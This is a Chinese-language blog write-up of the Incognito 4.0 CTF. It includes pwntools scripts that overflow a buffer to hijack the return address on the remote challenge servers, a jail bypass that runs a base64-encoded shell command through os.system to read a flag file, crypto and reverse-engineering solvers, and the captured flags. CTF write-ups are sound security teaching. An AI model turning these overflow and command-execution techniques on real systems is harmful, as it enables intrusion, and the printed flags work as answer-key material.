Incognito 4.0 CTF Write Up

已于 2023-02-19 09:25:19 修改
阅读量156 收藏
点赞数
分类专栏: Write Up 文章标签: 网络安全 安全 密码学
于 2023-02-19 09:22:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/g0at_sec/article/details/129107527
版权

Incognito 4.0

Web

1. get flag 1

[http://0.0.0.0:9001/flag.txt
1676715182889.png

2. get flag 2

http://[::]:9001/flag.txt
1676715283910.png

Pwn

1. babyFlow

from pwn import *

p = remote('143.198.219.171',5000)
p.recv()
g = (0x14+4)*'a'+p32(0x80491fc)
p.sendline(g)
p.interactive()

#ictf{bf930bcd-6c10-4c05-bdd8-435db4b50cdb}

2. Gainme

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
p  = remote('143.198.219.171',5003)
p.recvline()
p.recvuntil('Level 0:')
p.sendline("ICTF4")
p.recvuntil('Level 1:')
p.sendline('dasDASQWgjtrkodsc')
p.recvuntil('Level 2:')
p.sendline(p64(0xDEADBEEF))
p.recvuntil('Level 3:')
p.sendline('1')
p.interactive()

#ictf{g@inm3-sf23f-4fd2150cd33db}

Reverse

1. Meow

data=open("Meow","rb").read()
print(data[1::2].decode(errors='ignore'))

#ictf{easiest_challenge_of_them_all}

Crypto

1. Ancient

下载的图片需要手动加png文件头

https://jsom1.github.io/_challenges/templed

在这里插入图片描述

一个比赛原题
手动对着表转一下就行
在这里插入图片描述

2. Crypto1

with open("result", 'r', encoding='utf-8') as f:
    cy = f.read()
print(cy)
print(len(cy))

def func(f, i):
    if i<5:
        out = ord(f) ^ 0x76 ^ 0xAD
        var1 = (out & 0xAA) >> 1
        var2 = 2 * out & 0xAA
        return var1 | var2 
    elif i>=5 and i<10:
        out = ord(f) ^ 0x76 ^ 0xBE
        var1 = (out & 0xCC) >> 2
        var2 = 4 * out & 0xCC
        return var1 | var2
    else:
        out = ord(f) ^ 0x76 ^ 0xEF
        var1 = (out & 0xF0) >> 4
        var2 = 16 * out & 0xF0
        return var1 | var2

dic = {}
flag = ''
for i in range(15):
    for j in range(128):
        t = chr(func(chr(j), i))
        if t==cy[i]:
            print(i, chr(j), j)
            flag += chr(j)
            break

print(flag)

#ictf{88f30d1cd1ab443}

TheOnlyJail

1. TheOnlyJail

import os
import base64

os.system(b64.base64decode("some_base64_encoded_command_like_cat /home/ctf/flag.txt"))
_g0at_
关注
专栏目录
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 952
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
笔记,后期整理
weixin_30278237的博客
08-06 8388
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
Incognito CTF 3.0部分WP及赛后复现
qq_45862635的博客
04-26 551
Incognito CTF 3.0部分WP及赛后复现,剩下的有时间继续复现
Sqlmap中文手册详解
酒醉浮生的博客
11-13 2659
一、Sqlmap是什么 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 完全支持布尔型盲注、时间...
权限提升总结
Christ1na的博客
03-07 6255
提权 内网
Linux(CentOS)下,各种协议,端口号
山不在高,有金则名
07-16 8万+
DNS:/etc/resolv.conf 主机名:/etc/sysconfig/network 私有主机名:/etc/hosts 网卡配置文件存放目录:/etc/sysconfig/network-scripts/ IP/NetMask/Gateway等:/etc/sysconfig/network-scripts/ifcfg-em1 网络协议(IP):/etc/protocols 网
linux 下各个端口及他们的作用
kiwi的专栏
07-28 5万+
# /etc/services: # $Id: services,v 1.48 2009/11/11 14:32:31 ovasik Exp $ # # Network services, Internet style # IANA services version: last updated 2009-11-10 # # Note that it is presently the p
222
04-24 5万+
# /etc/services:# $Id: services,v 1.48 2009/11/11 14:32:31 ovasik Exp $## Network services, Internet style# IANA services version: last updated 2009-11-10## Note that it is presently the policy of IAN
常用端口总结
热门推荐
u014182755的专栏
06-11 12万+
TCP和UDP采用16bit的端口浩来识别应用程序。那么常用的知名端口号有哪些呢?
is-incognito-mode::bust_in_silhouette:用于识别浏览器是否处于隐身模式的功能:eyes:
04-28
const isIncognito = require ( 'is-incognito-mode' ) . default ; /* Function returns Promise, which could be: - resolved with true, if Incognito mode is opened - resolved with false, if regular win
Search Incognito-crx插件
03-19
通过将可能跟踪到的搜索重定向到以隐私为重点的搜索引擎Search Incognito,可以使您的搜索保持私密。 大公司会跟踪您的搜索并在Internet上关注您。通过将可能跟踪到的搜索重定向到以隐私为重点的搜索引擎Search ...
Incognito Mode-crx插件
04-04
"匿名模式-crx插件"是一款专为Chrome浏览器设计的扩展程序,它的主要功能是帮助用户自动清除浏览历史中的敏感信息,从而保护用户的隐私。在日常网络活动中,我们经常访问一些不想被他人知晓或者不希望在浏览记录中...
Incognito Search-crx插件
04-04
请仔细阅读:单击上方右上角的“免费+添加到Chrome”按钮并安装Incognito Search新标签页浏览器扩展程序,即表示您同意安装此应用程序,并同意最终用户许可协议和隐私权政策并接收将来的任何更新和升级。 您可以随时...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8530
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安全知识见闻-脚本语言对与安全的重要性
2201_75446043的博客
10-27 1161
批处理文件是以.bat扩展名结尾的文本文件,其中包含一系列命令,通常用于自动化任务。在Windows操作系统中,批处理文件可以通过命令提示符(CMD)运行。PowerShell是微软推出的一种任务自动化和配置管理框架,结合了命令行界面和脚本语言的特性。它的命令称为“cmdlet”,支持对象导向,能够处理复杂的数据结构。编写宏病毒、脚本病毒、BIOS病毒或进行内网渗透都需要特定的技术知识和编程技能,类似的脚本病毒还有很多,无法一一列举。
API接口开放与安全管控 - 原理与实践
whisperzzza的博客
10-27 1327
API安全是接口开放的前提条件 在API对外开放时,确保其安全性至关重要,因为API直接暴露给外部环境,容易成为攻击目标。一旦被恶意利用,可能导致数据泄露、服务滥用等严重后果。因此,通过API网关实施严格的接口安全管理措施,如身份验证、访问控制和流量限制,成为保护后端服务免受威胁的第一道防线。这不仅有助于维护系统的稳定性和可靠性,还能增强用户对平台的信任度。
服务攻防之开发组件安全
qq_63831588的博客
10-28 1177
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
【 纷享销客-注册安全分析报告-无验证方式导致安全隐患】
最新发布
10-31 501
纷享销客(北京易动纷享科技有限责任公司)总部位于北京市海淀区中关村,目前在北京、上海、广州、深圳、杭州、南京、武汉、成都、长沙、郑州、西安、济南、香港等13个城市设立直营省分公司,在全国50余个城市建立营销服务中心。截至目前,员工总数1000余人,产品研发团队300余人,是一家具备完善的研发、实施交付能力的优质SaaS企业。纷享销客以连接型CRM为特色,连接业务,连接人,连接系统,实现以客户为中心,企业内部和上下游业务的高效协作。
【商汤科技-注册/登录安全分析报告】
10-26 1588
作为人工智能软件公司,商汤科技以“坚持原创,让AI引领人类进步”为使命,旨在持续引领人工智能前沿研究,持续打造更具拓展性更普惠的人工智能软件平台,推动经济、社会和人类的发展,并持续吸引及培养顶尖人才,共同塑造未来。商汤科技拥有深厚的学术积累,并长期投入于原创技术研究,不断增强行业领先的多模态、多任务通用人工智能能力。
option.add_argument('--incognito')
06-10
option.add_argument('--incognito')是Chrome浏览器的一个启动参数,用于启动浏览器的隐身模式。 在隐身模式下,Chrome浏览器不会保存用户的浏览记录、cookie、表单数据等信息,用户在隐身模式下的浏览行为不会被记录下来。这对于需要保护用户隐私的场景非常有用,比如进行敏感操作、访问不受信任的网站等。 该选项可以通过以下方式添加到ChromeOptions中: ```python from selenium import webdriver options = webdriver.ChromeOptions() options.add_argument('--incognito') # 启动隐身模式 driver = webdriver.Chrome(chrome_options=options) ``` 启动隐身模式后,用户的浏览行为和操作都与正常模式下有所不同,例如无法使用浏览器历史记录、不能访问存储在本地的cookie等。因此,在使用隐身模式时需要注意这些限制。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值